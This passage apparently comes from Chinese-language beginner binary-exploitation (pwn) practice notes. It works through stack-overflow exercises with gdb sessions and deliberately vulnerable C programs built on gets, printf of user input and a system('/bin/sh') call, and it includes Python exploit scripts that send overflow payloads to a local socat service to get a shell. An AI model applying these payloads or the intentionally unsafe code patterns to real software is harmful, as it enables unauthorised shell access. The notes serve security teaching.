es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) ni
0x000055555555530d in main ()
(gdb) x/10i $rip
=> 0x55555555530d <main+120>: jne 0x55555555531b <main+134>
0x55555555530f <main+122>: lea rdi,[rip+0x2cfa] # 0x555555558010 <sh>
0x555555555316 <main+129>: call 0x555555555272 <func>
0x55555555531b <main+134>: mov eax,0x0
0x555555555320 <main+139>: mov rdx,QWORD PTR [rbp-0x8]
0x555555555324 <main+143>: xor rdx,QWORD PTR fs:0x28
0x55555555532d <main+152>: je 0x555555555334 <main+159>
0x55555555532f <main+154>: call 0x5555555550c0 <__stack_chk_fail@plt>
0x555555555334 <main+159>: leave
0x555555555335 <main+160>: ret
(gdb) ni
0x000055555555530f in main ()
(gdb) x/10i $rip
=> 0x55555555530f <main+122>: lea rdi,[rip+0x2cfa] # 0x555555558010 <sh>
0x555555555316 <main+129>: call 0x555555555272 <func>
0x55555555531b <main+134>: mov eax,0x0
0x555555555320 <main+139>: mov rdx,QWORD PTR [rbp-0x8]
0x555555555324 <main+143>: xor rdx,QWORD PTR fs:0x28
0x55555555532d <main+152>: je 0x555555555334 <main+159>
0x55555555532f <main+154>: call 0x5555555550c0 <__stack_chk_fail@plt>
0x555555555334 <main+159>: leave
0x555555555335 <main+160>: ret
0x555555555336: nop WORD PTR cs:[rax+rax*1+0x0]
(gdb) n
Single stepping until exit from function main,
which has no line number information.
$ whoami
hackpython脚本pwn
基础内容
shell无法打不可见字符,只能使用脚本进行pwn,目前常见的pwn框架是pwntools,这里以一个python2脚本进行解释:
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_5$ cd ../test_6
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_6$ ls
question_1_plus.c question_1_plus_py2.py question_1_plus_x64
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_6$ cat question_1_plus.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char sh[]="/bin/sh";
int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}
int func(char *cmd){
system(cmd);
return 0;
}
int main(){
char a[8] = {};
char b[8] = {};
//char a[1] = {'b'};
puts("input:");
gets(a);
printf(a);
if(b[0]==0x10){
func(sh);
}
return 0;
}hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_6$ ./question_1_plus_x64
input:
aaaaaaaa\x10
aaaaaaaa\x10hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_6$ cat question_1_plus_py2.py
import socket
import telnetlib
import struct
def P32(val):
return struct.pack("", val)
def pwn():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8888))
payload = 'A'*0x8 + '\x10'
s.sendall(payload + '\n')
t = telnetlib.Telnet()
t.sock = s
t.interact()
if __name__ == "__main__":
# socat tcp-l:8888,fork exec:./question_1_plus_x64,reuseaddr
pwn()hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_6$ nc 127.0.0.1 8888
aaaaaaaadeadbeef
input:
aaaaaaaadeadbeef
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_6$ nc 127.0.0.1 8888
aaaaaaaaaa
input:
aaaaaaaaaa作业
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_7$ gcc -no-pie question_3.c
question_3.c: In function ‘main’:
question_3.c:26:2: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(&a);
^~~~
fgets
/tmp/cc9KypAt.o: In function `main':
question_3.c:(.text+0xc6): warning: the `gets' function is dangerous and should not be used.
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_7$ ls
a.out question_3.c question_3_x64
hack@QC-20210627LTVJ:/mnt/e/qqdownload/pwn/chapter_1/test_7$ gdb ./a.out
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./a.out...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 1 at 0x40076f
Starting program: /mnt/e/qqdownload/pwn/chapter_1/test_7/a.out
Temporary breakpoint 1, 0x000000000040076f in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040076b <+0>: push rbp
0x000000000040076c <+1>: mov rbp,rsp
=> 0x000000000040076f <+4>: sub rsp,0x20
0x0000000000400773 <+8>: mov rax,QWORD PTR fs:0x28
0x000000000040077c <+17>: mov QWORD PTR [rbp-0x8],rax
0x0000000000400780 <+21>: xor eax,eax
0x0000000000400782 <+23>: mov eax,0x0
0x0000000000400787 <+28>: call 0x4006e7 <init_func>
0x000000000040078c <+33>: mov QWORD PTR [rbp-0x10],0x0
0x0000000000400794 <+41>: lea rdi,[rip+0xc9] # 0x400864
0x000000000040079b <+48>: call 0x4005b0 <puts@plt>
0x00000000004007a0 <+53>: lea rax,[rbp-0x14]
0x00000000004007a4 <+57>: mov rdi,rax
0x00000000004007a7 <+60>: mov eax,0x0
0x00000000004007ac <+65>: call 0x4005e0 <gets@plt>
0x00000000004007b1 <+70>: cmp QWORD PTR [rbp-0x10],0x0
0x00000000004007b6 <+75>: je 0x4007c3 <main+88>
0x00000000004007b8 <+77>: mov rdx,QWORD PTR [rbp-0x10]
0x00000000004007bc <+81>: mov eax,0x0
0x00000000004007c1 <+86>: call rdx
0x00000000004007c3 <+88>: mov eax,0x0
0x00000000004007c8 <+93>: mov rcx,QWORD PTR [rbp-0x8]
0x00000000004007cc <+97>: xor rcx,QWORD PTR fs:0x28
0x00000000004007d5 <+106>: je 0x4007dc <main+113>
0x00000000004007d7 <+108>: call 0x4005c0 <__stack_chk_fail@plt>
0x00000000004007dc <+113>: leave
0x00000000004007dd <+114>: ret
End of assembler dump.
(gdb) b *0x00000000004007b8
Breakpoint 2 at 0x4007b8
(gdb) c
Continuing.
input:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Breakpoint 2, 0x00000000004007b8 in main ()
(gdb) x/10i $rip
=> 0x4007b8 <main+77>: mov rdx,QWORD PTR [rbp-0x10]
0x4007bc <main+81>: mov eax,0x0
0x4007c1 <main+86>: call rdx
0x4007c3 <main+88>: mov eax,0x0
0x4007c8 <main+93>: mov rcx,QWORD PTR [rbp-0x8]
0x4007cc <main+97>: xor rcx,QWORD PTR fs:0x28
0x4007d5 <main+106>: je 0x4007dc <main+113>
0x4007d7 <main+108>: call 0x4005c0 <__stack_chk_fail@plt>
0x4007dc <main+113>: leave
0x4007dd <main+114>: ret
(gdb) x/20g $rbp-0x10
0x7fffffffdba0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbb0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbc0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbd0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbe0: 0x6161616161616161 0x77c3006161616161
0x7fffffffdbf0: 0x0000000000400600 0x00007fffffffdc90
0x7fffffffdc00: 0x0000000000000000 0x0000000000000000
0x7fffffffdc10: 0x883cca95299ca51c 0x883cda2ae662a51c
0x7fffffffdc20: 0x00007fff00000000 0x0000000000000000
0x7fffffffdc30: 0x0000000000000000 0x00007ffff7de38d3
(gdb) p &func
$1 = (<text variable, no debug info> *) 0x40074c <func>
(gdb) set *0x7fffffffdba0=0x40074c
(gdb) x/20g $rbp-0x10
0x7fffffffdba0: 0x616161610040074c 0x6161616161616161
0x7fffffffdbb0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbc0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbd0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbe0: 0x6161616161616161 0x77c3006161616161
0x7fffffffdbf0: 0x0000000000400600 0x00007fffffffdc90
0x7fffffffdc00: 0x0000000000000000 0x0000000000000000
0x7fffffffdc10: 0x883cca95299ca51c 0x883cda2ae662a51c
0x7fffffffdc20: 0x00007fff00000000 0x0000000000000000
0x7fffffffdc30: 0x0000000000000000 0x00007ffff7de38d3
(gdb) set *0x7fffffffdba4=0
(gdb) x/20g $rbp-0x10
0x7fffffffdba0: 0x000000000040074c 0x6161616161616161
0x7fffffffdbb0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbc0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbd0: 0x6161616161616161 0x6161616161616161
0x7fffffffdbe0: 0x6161616161616161 0x77c3006161616161
0x7fffffffdbf0: 0x0000000000400600 0x00007fffffffdc90
0x7fffffffdc00: 0x0000000000000000 0x0000000000000000
0x7fffffffdc10: 0x883cca95299ca51c 0x883cda2ae662a51c
0x7fffffffdc20: 0x00007fff00000000 0x0000000000000000
0x7fffffffdc30: 0x0000000000000000 0x00007ffff7de38d3
(gdb) x/10i $rip
=> 0x4007b8 <main+77>: mov rdx,QWORD PTR [rbp-0x10]
0x4007bc <main+81>: mov eax,0x0
0x4007c1 <main+86>: call rdx
0x4007c3 <main+88>: mov eax,0x0
0x4007c8 <main+93>: mov rcx,QWORD PTR [rbp-0x8]
0x4007cc <main+97>: xor rcx,QWORD PTR fs:0x28
0x4007d5 <main+106>: je 0x4007dc <main+113>
0x4007d7 <main+108>: call 0x4005c0 <__stack_chk_fail@plt>
0x4007dc <main+113>: leave
0x4007dd <main+114>: ret
(gdb) n
Single stepping until exit from function main,
which has no line number information.
$ whoami
hackimport socket
import telnetlib
import struct
def P32(val):
return struct.pack("", val)
def pwn():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8888))
payload = 'A'*4 + '\x1f\x12\x40\x00\x00\x00\x00\x00' #注意端序
s.sendall(payload + '\n')
t = telnetlib.Telnet()
t.sock = s
t.interact()
if __name__ == "__main__":
# socat tcp-l:8888,fork exec:./question_1_plus_x64,reuseaddr
pwn()
